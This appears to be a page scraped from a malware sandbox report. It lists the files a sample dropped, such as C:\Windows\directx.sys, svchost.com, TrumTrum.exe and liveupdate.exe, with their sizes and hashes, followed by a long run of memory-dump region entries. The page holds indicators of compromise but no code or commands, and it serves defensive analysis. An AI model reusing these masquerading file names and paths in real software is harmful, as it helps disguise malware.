57726bbd1328ace0f9159825b8f2b2b2c2c87f69105922cf4bfcc7137df9d5f69442771bd592efb18f8c92f9ab3ac7dfa374295eff605357ac5442659c0f74a3

Download Submit
C:\Windows\directx.sys

Filesize
51B

MD5
442cffbda724ff04069c2c9a507e27e9

SHA1
8b5492b5ea8b9911fad01b54446a17da558e48ca

SHA256
944c8514cea6bfa1e147865022357467dc5eaaaec380d3d4c73c93953b6549a5

SHA512
80a18552e86e7da12c48f6bddad0664434e1e7cf2571e065796b6f33a44f9e7d2816d444c52c2232e5941c56c6dc08d7cfae7e36972a0d76901419de95cd9c76

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
fdbfce9809d12b3dc5e6944176ad76b3

SHA1
377f982258ad2ded33a283822c52ec4ce5425223

SHA256
a0357a62ba4bf4f2c45f7110827f319028c16126c58d964a6296ae84eeafa860

SHA512
1f4f3643fb435d2f21a5a6e9f33c2ae26a383a49b878ae796df72c51f3b904b50e6e7e2c5150b247223440fbed666ffcf35f7748c21c5bbd240f672469f169cc

Download Submit
C:\Windows\directx.sys

Filesize
49B

MD5
fe6d00885df735bf7e0f152afbfeaa85

SHA1
eea00c9d40745a2d4185d0356052697a56aa7aa9

SHA256
c7a27e8dc22136554fb51532f358d448afa65cd0f085c4d8de677d62231866ea

SHA512
088144f791f36f35f76bc47191ecc0b1a06efb630413a44d39423ccf35cccc5bc745bf0c98f6e8066125f42ab7918dff22a1b8887c9ab081ea4823c1738defa9

Download Submit
C:\Windows\directx.sys

Filesize
90B

MD5
59c9e2a41f560931ec584bc78d3f2d8d

SHA1
ad2a1b1c986e14a642a2e5660fe3be6948a24e52

SHA256
e929029d1f12e4fe30a18f1378d98140d3e2a72913d62daf70d4579b76c58ee6

SHA512
b9e555ef225ddbf5be4fafb9bb31e9b8c8219565afa25ca7ee12f76c006f2be8f959d7bc8ed043d0224d7c2c4cb2fe2877263d924fc9a96340ca00219b59d80d

Download Submit
C:\Windows\directx.sys

Filesize
54B

MD5
744996371149187cc00e3bcd809c7398

SHA1
0f87f4f7691f32a1019cac1803a3273e91571556

SHA256
af6960f9c1ab16c22d5cc276a97e9c73242dfccfb2bea1a58e7df1a6547b8abf

SHA512
1fd1c23067415c05492678754a1747ba4d74a441f781e5cf869d194f633a2700a23e39d6025eac3207eac82be42b5eb9bec223ab284566f20481ad7d8abc4289

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
a2136aac49064f03f353954e6153abdc

SHA1
f8dd33b0db917a355371715e3aa1845e1ef8e94a

SHA256
3705986a7654164f3c96ca90721b8bcf4264f1b9c2ad6d49972b7d9a037f40de

SHA512
994c9763baf65060be68647ba5c3034da22d6833dd1e7530efec91e750342479553173b034b61c90ce95cfb53e9434e5e2731242f8e804feaf93195ca0d4d4d9

Download Submit
C:\Windows\directx.sys

Filesize
50B

MD5
b697066a885fd40b0ef4068a389a8a09

SHA1
a90f6ef31c809ce94966eb5efdb46a0958d8f73c

SHA256
748bc5f53e112deb3d464963a179bf30358dfcd9b4f22d57cabb0fe977569689

SHA512
af1ae9f181d9691fc7be93e5b025dcc5b8f4707cc825bd6595c581bbbf040e2d4f12573b8a343ec16adb70c5ba8ee57b78a274242eb71fe30657457d15faa1cc

Download Submit
C:\Windows\svchost.com

Filesize
40KB

MD5
36fd5e09c417c767a952b4609d73a54b

SHA1
299399c5a2403080a5bf67fb46faec210025b36d

SHA256
980bac6c9afe8efc9c6fe459a5f77213b0d8524eb00de82437288eb96138b9a2

SHA512
1813a6a5b47a9b2cd3958cf4556714ae240f2aa19d0a241b596830f0f2b89a33ec864d00ce6a791d323a58dfbff42a0fded65eefbf980c92685e25c0ec415d92

Download Submit
C:\Windows\winknavrso.exe

Filesize
23KB

MD5
9d2b22562b9a3958dfd7e6e6fa7bd66f

SHA1
1941c24958ac09cf518f4124225b2d0b5d874cf0

SHA256
84daa9d52f759af343741880a3b66a3abb886310de7f552743d99e69741c6450

SHA512
8c0b54e01f62207edaaf8f967fe83eacd3e278660c1764feb3fde68bfd376ba875012849f969d8b5922bd6b791a231bf75dc76eade227e2fd25f4791163d9dd1

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\9aoo6eyj.0.cs

Filesize
447B

MD5
1640a04633fee0dfdc7e22c4f4063bf6

SHA1
3cb525c47b5dd37f8ee45b034c9452265fba5476

SHA256
55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0

SHA512
85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\9aoo6eyj.cmdline

Filesize
309B

MD5
cb9b18a42325466c9715f666e831a977

SHA1
e6381a368a6597621074452be389dc0a1de83617

SHA256
838b2b98b86227d43fd875d0c177c2a028d7ce35ba8b5ec8f1e19d6d02c37ec2

SHA512
88330d9cfc7129f9863827770e6c47aa686b78ead30e4e95af40dc9dad50178fc958f4a5bad4007529d24b16ba5efacd9b5ed685275007e3915cc1bfbb06df35

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC868E.tmp

Filesize
652B

MD5
ac7ecc584de5c20ff8b41fdd5ae967c3

SHA1
2b8b04f7972558a81fc26d26a2f772e13bd46aae

SHA256
e13614099b04f1b381149af6b315937d36dcd9913634577b844c0ffab6e636a0

SHA512
852cb34ad09facf57478bff36f5008bb2c186e93a1da108457bf9fea0b2cc5c58b2f7e9e381ff2897cc143d6c137198d7e15d7a05659e15c148294ab58febb56

Download Submit
\PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE

Filesize
252KB

MD5
9e2b9928c89a9d0da1d3e8f4bd96afa7

SHA1
ec66cda99f44b62470c6930e5afda061579cde35

SHA256
8899b4ed3446b7d55b54defbc1acb7c5392a4b3bc8ec2cdc7c31171708965043

SHA512
2ca5ad1d0e12a8049de885b90b7f56fe77c868e0d6dae4ec4b6f3bc0bf7b2e73295cc9b1328c2b45357ffb0d7804622ab3f91a56140b098e93b691032d508156

Download Submit
\Users\Admin\AppData\Local\Temp\3582-490\Zenith_Hub_20240229201747443.exe

Filesize
585KB

MD5
a4dd3c31a34f9d2272882a26b208e61d

SHA1
454e303479599f9039ab2385f98fe79b6d13ad51

SHA256
32061e5e3d3841d8051682cbb9b317aadd3d4a60cc5cc3a87a9795f7ec83ba21

SHA512
34fea9920c18b1be4d8ac2ac424e88c999dde47e752a794e5a6a2cfe585aedb36ed9280610aee32a9a02bf8e7307271a0051c06dcc8d3ed8bfcccf58483f4caa

Download Submit
\Users\Admin\AppData\Local\Temp\3582-490\Zenith_Hub_20240229201747443.exe

Filesize
1.3MB

MD5
ae16ce1655bb21ce82d472a12f6a0d45

SHA1
10af68278bbd5be9a4a478839b967e00fb5f1f68

SHA256
7a6508b095cd88f10dad4004841e50f576606414bf1fa33213f65668ebb84bf6

SHA512
8de88920dde83d8436db858f2cec4795e28c85e7ef1cc6276cc2d4d1c54bbffabab1f724f4aa7d27dcce6e83643121dca2b938742391b92e07f76764a0b69138

Download Submit
\Users\Admin\AppData\Local\Temp\Files\TrumTrum.exe

Filesize
2.6MB

MD5
6698bf7d1a37a140bd8331d2450dbd8c

SHA1
0468ff97bc7bf3058b5305376a51fb82ff74c5e9

SHA256
925f19b9e9a8dedee0690670705e565b95b7277992d84c6ce4bd796773c55c12

SHA512
67599c19cbbc606c0f94d492a117156953ab5a2eb2d10a56c9ad375b27c661eaa0005bc27d2ea34ddbbf6c0f6940e803f855ed58c98ba18ba1a1127972d0371f

Download Submit
\Users\Admin\AppData\Local\Temp\Files\TrumTrum.exe

Filesize
2.2MB

MD5
53245dc17cdba4c2830e0191802ae5e6

SHA1
f805a6fe5d7361ecc27323759e267b0a60f085bd

SHA256
11fcc615723e049c7c5046425a46b546811f57aa5d03b8e4c521a8506ecc8750

SHA512
d6552218e3b7985ef97c859d49e640e1751d12de23b4a2f26e010d6047eccf92d4380c2afd2437b4ef01aded9c07f9a0811524595968efdc0c0b7eaa8737ba4b

Download Submit
\Users\Admin\AppData\Local\Temp\Files\Zenith_Hub_20240229201747443.exe

Filesize
448KB

MD5
67d0e8039b70f46efc11e11efd8c953c

SHA1
9e1b29c532aa59012f696876c33b4d7ce823a8d9

SHA256
f61924476a080b0b7b4f50411b6fb822af7c5bf9cf48af3c0d57fbdaa60f5ea3

SHA512
1eb845d7f794dfaaff5c557fcdcb3c73544c3e1bc6af87a6384d72f3b7350047cdb1fb7d7517fb7e54f2fd3a047a1670fce1bd5e4a1f06ba50e7398e8c2090e5

Download Submit
\Users\Admin\AppData\Local\Temp\Files\pinguin.exe

Filesize
1.2MB

MD5
7afac18b45b56aba3ed60cd43394d6d1

SHA1
e54ccb022acbb557d1060f37413991ca0195481c

SHA256
597bd28d7f3796840d5179db670cbdddb7ac2033640d63a3e51fb4d08985c3b7

SHA512
f5b56ba3498f2d51921195a2a5423f62f88e5fc065985d6c46e68501c250c2fbd2242f64c61f5c6ba8caa7ae26ab21d1a15789789782100315c60a50a0df35f3

Download Submit
\Users\Admin\AppData\Roaming\wshom\liveupdate.exe

Filesize
485KB

MD5
6bf3b86782b7911b76029737162ae206

SHA1
1b8009865c79b5674734ba4ce9a6905bed78182e

SHA256
535f67c47f811aa5b421904959dd6931396a52cdbb9ddb69bface741356dbbef

SHA512
385291ef2ba36b39fd6c7c5af08ad9127d60685e28d69e55152341f522b79f2f4ca3c1aa9e13575dbce0699d976b34dbb5985d08495ca22dc20ed323b7d80ba1

Download Submit
memory/936-522-0x0000000077CF0000-0x0000000077CF1000-memory.dmp

Filesize
4KB

Download
memory/936-478-0x0000000000060000-0x0000000000061000-memory.dmp

Filesize
4KB

Download
memory/952-925-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/952-924-0x0000000000400000-0x0000000000930000-memory.dmp

Filesize
5.2MB

Download
memory/952-821-0x0000000000400000-0x0000000000930000-memory.dmp

Filesize
5.2MB

Download
memory/952-822-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1076-0-0x0000000000B30000-0x0000000000B38000-memory.dmp

Filesize
32KB

Download
memory/1076-71-0x0000000006310000-0x0000000007173000-memory.dmp

Filesize
14.4MB

Download
memory/1076-76-0x0000000004C80000-0x0000000004CC0000-memory.dmp

Filesize
256KB

Download
memory/1076-2-0x0000000004C80000-0x0000000004CC0000-memory.dmp

Filesize
256KB

Download
memory/1076-1-0x0000000074D40000-0x000000007542E000-memory.dmp

Filesize
6.9MB

Download
memory/1076-69-0x0000000006310000-0x0000000007173000-memory.dmp

Filesize
14.4MB

Download
memory/1076-74-0x0000000074D40000-0x000000007542E000-memory.dmp

Filesize
6.9MB

Download
memory/1088-113-0x0000000077B40000-0x0000000077CE9000-memory.dmp

Filesize
1.7MB

Download
memory/1088-118-0x0000000071020000-0x0000000071194000-memory.dmp

Filesize
1.5MB

Download
memory/1088-114-0x0000000071020000-0x0000000071194000-memory.dmp

Filesize
1.5MB

Download
memory/1088-112-0x0000000071020000-0x0000000071194000-memory.dmp

Filesize
1.5MB

Download
memory/1088-110-0x0000000001370000-0x00000000013F0000-memory.dmp

Filesize
512KB

Download
memory/1248-477-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/1288-992-0x0000000000C00000-0x0000000000E28000-memory.dmp

Filesize
2.2MB

Download
memory/1628-769-0x0000000077B40000-0x0000000077CE9000-memory.dmp

Filesize
1.7MB

Download
memory/1628-491-0x0000000005080000-0x0000000005081000-memory.dmp

Filesize
4KB

Download
memory/1628-473-0x0000000077B40000-0x0000000077CE9000-memory.dmp

Filesize
1.7MB

Download
memory/1784-172-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/1784-115-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/1888-177-0x00000000FFE40000-0x00000000FFF64000-memory.dmp

Filesize
1.1MB

Download
memory/1888-175-0x0000000140000000-0x00000001406E2000-memory.dmp

Filesize
6.9MB

Download
memory/1888-189-0x0000000140000000-0x00000001406E2000-memory.dmp

Filesize
6.9MB

Download
memory/1952-901-0x000007FEECCF0000-0x000007FEED6DC000-memory.dmp

Filesize
9.9MB

Download
memory/1952-885-0x0000000000630000-0x0000000000631000-memory.dmp

Filesize
4KB

Download
memory/1952-884-0x000000001BEF0000-0x000000001BF70000-memory.dmp

Filesize
512KB

Download
memory/1952-876-0x000007FEECCF0000-0x000007FEED6DC000-memory.dmp

Filesize
9.9MB

Download
memory/1952-855-0x0000000000C90000-0x0000000001194000-memory.dmp

Filesize
5.0MB

Download
memory/2124-195-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/2124-192-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/2124-178-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/2124-179-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/2124-198-0x0000000000290000-0x00000000002B0000-memory.dmp

Filesize
128KB

Download
memory/2124-180-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/2124-181-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/2124-197-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/2124-196-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/2124-194-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/2124-193-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/2124-183-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/2124-182-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/2124-184-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/2124-185-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/2124-186-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/2124-188-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/2124-190-0x00000000001B0000-0x00000000001D0000-memory.dmp

Filesize
128KB

Download
memory/2124-191-0x0000000140000000-0x0000000140840000-memory.dmp

Filesize
8.2MB

Download
memory/2124-199-0x0000000000290000-0x00000000002B0000-memory.dmp

Filesize
128KB

Download
memory/2272-923-0x000007FEEC300000-0x000007FEECCEC000-memory.dmp

Filesize
9.9MB

Download
memory/2272-922-0x00000000013B0000-0x00000000018B4000-memory.dmp

Filesize
5.0MB

Download
memory/2272-927-0x00000000005B0000-0x00000000005B1000-memory.dmp

Filesize
4KB

Download
memory/2272-926-0x00000000008E0000-0x0000000000960000-memory.dmp

Filesize
512KB

Download
memory/2272-957-0x000007FEEC300000-0x000007FEECCEC000-memory.dmp

Filesize
9.9MB

Download
memory/2424-807-0x0000000001D70000-0x0000000001D97000-memory.dmp

Filesize
156KB

Download
memory/2424-806-0x0000000000270000-0x0000000000370000-memory.dmp

Filesize
1024KB

Download
memory/2424-979-0x0000000000400000-0x000000000063B000-memory.dmp

Filesize
2.2MB

Download
memory/2424-808-0x0000000000400000-0x000000000063B000-memory.dmp

Filesize
2.2MB

Download
memory/2424-920-0x0000000000270000-0x0000000000370000-memory.dmp

Filesize
1024KB

Download
memory/2424-921-0x0000000000400000-0x000000000063B000-memory.dmp

Filesize
2.2MB

Download
memory/2452-384-0x000007FEF5080000-0x000007FEF5A1D000-memory.dmp

Filesize
9.6MB

Download
memory/2452-259-0x0000000001FA0000-0x0000000002020000-memory.dmp

Filesize
512KB

Download
memory/2452-385-0x0000000001FA0000-0x0000000002020000-memory.dmp

Filesize
512KB

Download
memory/2452-410-0x0000000001FA0000-0x0000000002020000-memory.dmp

Filesize
512KB

Download
memory/2452-445-0x0000000001FA0000-0x0000000002020000-memory.dmp

Filesize
512KB

Download
memory/2452-298-0x0000000000480000-0x0000000000488000-memory.dmp

Filesize
32KB

Download
memory/2452-256-0x000007FEF5080000-0x000007FEF5A1D000-memory.dmp

Filesize
9.6MB

Download
memory/2452-260-0x000007FEF5080000-0x000007FEF5A1D000-memory.dmp

Filesize
9.6MB

Download
memory/2508-465-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2668-174-0x0000000071020000-0x0000000071194000-memory.dmp

Filesize
1.5MB

Download
memory/2668-122-0x0000000077B40000-0x0000000077CE9000-memory.dmp

Filesize
1.7MB

Download
memory/2668-170-0x0000000071020000-0x0000000071194000-memory.dmp

Filesize
1.5MB

Download
memory/2668-171-0x0000000071020000-0x0000000071194000-memory.dmp

Filesize
1.5MB

Download
memory/2668-120-0x0000000071020000-0x0000000071194000-memory.dmp

Filesize
1.5MB

Download
memory/2696-289-0x0000000002230000-0x00000000022B0000-memory.dmp

Filesize
512KB

Download
memory/2700-796-0x0000000000400000-0x0000000000469000-memory.dmp

Filesize
420KB

Download
memory/2700-795-0x0000000000250000-0x00000000002B7000-memory.dmp

Filesize
412KB

Download
memory/2700-794-0x00000000005E0000-0x00000000006E0000-memory.dmp

Filesize
1024KB

Download
memory/2700-817-0x00000000005E0000-0x00000000006E0000-memory.dmp

Filesize
1024KB

Download
memory/2700-818-0x0000000000250000-0x00000000002B7000-memory.dmp

Filesize
412KB

Download
memory/2700-819-0x0000000000400000-0x0000000000469000-memory.dmp

Filesize
420KB

Download
memory/2836-95-0x0000000077B40000-0x0000000077CE9000-memory.dmp

Filesize
1.7MB

Download
memory/2836-83-0x0000000000400000-0x0000000000C8E000-memory.dmp

Filesize
8.6MB

Download
memory/2836-94-0x0000000071020000-0x0000000071194000-memory.dmp

Filesize
1.5MB

Download
memory/2836-98-0x0000000071020000-0x0000000071194000-memory.dmp

Filesize
1.5MB

Download
memory/2836-103-0x0000000071020000-0x0000000071194000-memory.dmp

Filesize
1.5MB

Download
memory/2836-117-0x0000000071020000-0x0000000071194000-memory.dmp

Filesize
1.5MB

Download
memory/2840-820-0x0000000001DA0000-0x00000000022D0000-memory.dmp

Filesize
5.2MB

Download
memory/2928-963-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2928-959-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2932-72-0x0000000000B00000-0x0000000001963000-memory.dmp

Filesize
14.4MB

Download
memory/2932-73-0x0000000000B00000-0x0000000001963000-memory.dmp

Filesize
14.4MB

Download
memory/2948-448-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2948-444-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2948-446-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2948-380-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2948-436-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2948-409-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2948-381-0x0000000000400000-0x000000000041B000-memory.dmp

Filesize
108KB

Download
memory/2960-938-0x0000000003690000-0x0000000003BC0000-memory.dmp

Filesize
5.2MB

Download
memory/2960-937-0x0000000003690000-0x0000000003BC0000-memory.dmp

Filesize
5.2MB

Download
memory/2960-832-0x0000000003690000-0x0000000003BC0000-memory.dmp

Filesize
5.2MB

Download
memory/2960-830-0x0000000003690000-0x0000000003BC0000-memory.dmp

Filesize
5.2MB

Download